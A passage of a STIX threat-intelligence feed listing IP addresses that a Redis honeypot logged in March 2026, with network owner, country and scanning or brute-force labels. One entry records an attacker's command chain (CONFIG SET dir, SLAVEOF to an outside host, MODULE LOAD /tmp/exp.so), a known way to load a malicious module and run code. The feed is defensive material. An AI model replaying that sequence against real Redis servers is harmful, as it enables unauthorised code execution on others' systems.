      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.197.111']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T12:25:07.000Z",
      "valid_until": "2026-04-06T12:25:06.000Z"
    },
    {
      "created": "2026-03-05T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=35; ports=6379; cc=CN; asn=4816; asn_org=China Telecom Group; cats=Generic Protocol Command Decode; redis_cmds=MODULE LOAD /tmp/exp.so,SLAVEOF 112.90.89.3 9632,config set rdbcompression no,CONFIG SET dir /tmp/,MODULE UNLOAD system; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--e7769577-1cd6-49f7-9adb-58dbd9655746",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-05T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '103.236.67.106']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T13:25:13.000Z",
      "valid_until": "2026-04-06T13:25:12.000Z"
    },
    {
      "created": "2026-03-05T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CA; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0",
      "id": "indicator--4fb2ff2c-681a-44c9-af70-3c461fac67b0",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '140.238.153.39']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T13:25:13.000Z",
      "valid_until": "2026-04-06T13:25:12.000Z"
    },
    {
      "created": "2026-03-05T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--f0a59a58-14d8-4e89-8617-5c954ce0d2f5",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.236.126.127']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T13:25:13.000Z",
      "valid_until": "2026-04-06T13:25:12.000Z"
    },
    {
      "created": "2026-03-05T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--c6b92cc8-ba57-45bf-a573-7358979b42a5",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '175.27.135.2']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T13:25:13.000Z",
      "valid_until": "2026-04-06T13:25:12.000Z"
    },
    {
      "created": "2026-03-05T15:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--3622bf7a-34dc-4e00-a984-29f5f1741edf",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T15:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '101.206.108.12']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T15:25:03.000Z",
      "valid_until": "2026-04-06T15:25:02.000Z"
    },
    {
      "created": "2026-03-05T15:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--d3131355-38d1-4b7f-bced-78ebf9da1736",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T15:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '135.222.182.210']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T15:25:03.000Z",
      "valid_until": "2026-04-06T15:25:02.000Z"
    },
    {
      "created": "2026-03-05T15:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--36067313-f90a-4c1d-a086-fe6d0f7da935",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T15:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '139.199.180.110']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T15:25:03.000Z",
      "valid_until": "2026-04-06T15:25:02.000Z"
    },
    {
      "created": "2026-03-05T15:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--cee8f52e-1e2b-49ef-b1dd-2a2011b9e409",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T15:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.139']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T15:25:03.000Z",
      "valid_until": "2026-04-06T15:25:02.000Z"
    },
    {
      "created": "2026-03-05T15:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--ef8d6a9c-e5fc-4899-9c74-27aa24c80c34",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T15:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.178.81.49']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T15:25:03.000Z",
      "valid_until": "2026-04-06T15:25:02.000Z"
    },
    {
      "created": "2026-03-05T15:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--f0a798a3-f65d-41ac-b03c-d5f2799479a7",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T15:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.226.167.46']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T15:25:03.000Z",
      "valid_until": "2026-04-06T15:25:02.000Z"
    },
    {
      "created": "2026-03-05T15:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--a5c936ef-a875-401c-8889-93cfccf2a064",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T15:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '206.168.34.54']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T15:25:03.000Z",
      "valid_until": "2026-04-06T15:25:02.000Z"
    },
    {
      "created": "2026-03-05T15:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=266605; asn_org=2B Tecnologias em Informatica LTDA; redis_cmd_hits=0",
      "id": "indicator--f7de5590-5a60-48cf-be37-b5d15bf648d1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T15:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.7.144.44']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T15:25:03.000Z",
      "valid_until": "2026-04-06T15:25:02.000Z"
    },
    {
      "created": "2026-03-05T16:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--517fdf8f-327c-48ba-90c2-2992bd4f9a2c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T16:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.52.84.198']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T16:25:15.000Z",
      "valid_until": "2026-04-06T16:25:12.000Z"
    },
    {
      "created": "2026-03-05T17:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=28; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; redis_cmds=GET /robots.txt HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--60da2ccf-5ef2-4d2c-bf88-a40d19ac1fad",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T17:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.99.141.235']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T17:25:06.000Z",
      "valid_until": "2026-04-06T17:25:05.000Z"
    },
    {
      "created": "2026-03-05T18:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0",
      "id": "indicator--aa97df55-3016-4c75-92ca-ea39aa773865",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T18:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '14.103.174.237']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T18:25:07.000Z",
      "valid_until": "2026-04-06T18:25:05.000Z"
    },
    {
      "created": "2026-03-05T18:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=25; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--96b96327-5f6a-4a0b-80e8-b32bb0877c49",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T18:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.103.157.194']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T18:25:07.000Z",
      "valid_until": "2026-04-06T18:25:05.000Z"
    },
    {
      "created": "2026-03-05T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0",
      "id": "indicator--aab783ee-ba73-4566-9e3e-7a4a197f3536",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '13.58.114.74']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T21:25:13.000Z",
      "valid_until": "2026-04-06T21:25:12.000Z"
    },
    {
      "created": "2026-03-05T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=25; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--4e46b47b-f645-4049-b265-e1b472786020",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '135.237.124.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T21:25:13.000Z",
      "valid_until": "2026-04-06T21:25:12.000Z"
    },
    {
      "created": "2026-03-05T22:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0",
      "id": "indicator--91d6db15-30de-4f83-98b3-b097e39d325f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T22:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '14.18.118.84']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T22:25:13.000Z",
      "valid_until": "2026-04-06T22:25:12.000Z"
    },
    {
      "created": "2026-03-05T23:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=DE; asn=58087; asn_org=Florian Kolb; redis_cmd_hits=0",
      "id": "indicator--64b2f1b0-67e8-468e-803a-07c4794c57fb",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T23:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '37.114.50.108']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T23:25:13.000Z",
      "valid_until": "2026-04-06T23:25:12.000Z"
    },
    {
      "created": "2026-03-05T23:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--2c63eeb0-a193-4caf-951e-0acb22f87726",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T23:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '81.70.2.239']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T23:25:13.000Z",
      "valid_until": "2026-04-06T23:25:12.000Z"
    },
    {
      "created": "2026-03-06T02:25:30.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--bd0d852f-8de9-4372-9fd4-6d4e0bf346ab",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T02:25:30.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '209.38.136.79']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T02:25:30.000Z",
      "valid_until": "2026-04-07T02:25:12.000Z"
    },
    {
      "created": "2026-03-06T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=55990; asn_org=Huawei Cloud Service data center; redis_cmd_hits=0",
      "id": "indicator--ccaab14e-acaf-4ea1-8d97-30e5e33623f9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '113.44.65.192']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T04:25:13.000Z",
      "valid_until": "2026-04-07T04:25:12.000Z"
    },
    {
      "created": "2026-03-06T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=7; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--7a86fc75-9915-4413-91b1-37a0f0471fcc",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.217.208.51']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T04:25:13.000Z",
      "valid_until": "2026-04-07T04:25:12.000Z"
    },
    {
      "created": "2026-03-06T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--9a5b5266-42f2-42df-aa87-5bd5697a2b59",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.116.232.29']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T04:25:13.000Z",
      "valid_until": "2026-04-07T04:25:12.000Z"
    },
    {
      "created": "2026-03-06T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--066d8b20-a22f-4980-af33-8590b0fdf2b1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.136.230.142']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T04:25:13.000Z",
      "valid_until": "2026-04-07T04:25:12.000Z"
    },
    {
      "created": "2026-03-06T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--5abdb8f6-66f2-4ca7-8d1f-a6c0ae7590a6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '81.69.43.221']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T04:25:13.000Z",
      "valid_until": "2026-04-07T04:25:12.000Z"
    },
    {
      "created": "2026-03-06T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--7a451679-7459-4e82-b526-bdbb30c402e1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.13.45.232']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T05:25:13.000Z",
      "valid_until": "2026-04-07T05:25:12.000Z"
    },
    {
      "created": "2026-03-06T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=ID; asn=153119; asn_org=PT Intan Pariwara; redis_cmd_hits=0",
      "id": "indicator--bd5a6661-b4e7-4172-9d35-1c74b4244c98",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '160.187.107.47']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T06:25:13.000Z",
      "valid_until": "2026-04-07T06:25:12.000Z"
    },
    {
      "created": "2026-03-06T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=23724; asn_org=IDC, China Telecommunications Corporation; redis_cmd_hits=0",
      "id": "indicator--56fc546b-4526-458a-91a9-95e6f86210d5",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '220.181.1.163']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T07:25:13.000Z",
      "valid_until": "2026-04-07T07:25:12.000Z"
    },
    {
      "created": "2026-03-06T08:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--61e0b349-01bc-4cae-9b59-bcfc1742c265",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T08:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.75.44.108']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T08:25:14.000Z",
      "valid_until": "2026-04-07T08:25:12.000Z"
    },
    {
      "created": "2026-03-06T08:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=BG; asn=50360; asn_org=Tamatiya EOOD; redis_cmd_hits=0",
      "id": "indicator--e701ab2b-a464-4cf2-85c6-154c3d7464a7",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T08:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '78.128.114.126']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T08:25:14.000Z",
      "valid_until": "2026-04-07T08:25:12.000Z"
    },
    {
      "created": "2026-03-06T09:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0",
      "id": "indicator--661de8ec-aa71-4d9a-983d-b21e4a0f236f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T09:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '159.54.171.233']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T09:25:09.000Z",
      "valid_until": "2026-04-07T09:25:06.000Z"
    },
    {
      "created": "2026-03-06T09:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=IN; asn=133311; asn_org=SUBHX INFOTECH OPC PRIVATE LIMITED; redis_cmd_hits=0",
      "id": "indicator--82b4cdd9-95f5-459d-9dcc-1a5dc6c334dd",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T09:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '160.22.254.250']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T09:25:09.000Z",
      "valid_until": "2026-04-07T09:25:06.000Z"
    },
    {
      "created": "2026-03-06T09:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--cc32bb7f-a02f-47ff-8a99-805e3d657f5d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T09:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.235.24.58']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T09:25:09.000Z",
      "valid_until": "2026-04-07T09:25:06.000Z"
    },
    {
      "created": "2026-03-06T09:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--5febb641-d692-445b-be9e-1422164bcd1a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T09:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.197.32.228']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T09:25:09.000Z",
      "valid_until": "2026-04-07T09:25:06.000Z"
    },
    {
      "created": "2026-03-06T09:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=27699; asn_org=TELEFONICA BRASIL S.A; redis_cmd_hits=0",
      "id": "indicator--b94efbc7-6b1c-4fd3-b0ac-6fdad0f0d5fd",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T09:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '200.171.87.44']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T09:25:09.000Z",
      "valid_until": "2026-04-07T09:25:06.000Z"
    },
    {
      "created": "2026-03-06T10:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--ab957f89-acec-4f34-9e0e-df7516aace68",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T10:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.236.24.189']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T10:25:02.000Z",
      "valid_until": "2026-04-07T10:25:01.000Z"
    },
    {
      "created": "2026-03-06T11:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=48; ports=6379; cc=RO; asn=204428; asn_org=SS-Net; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--04a8387f-61ea-48d8-974f-b9dd09f40661",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T11:25:15.000Z",
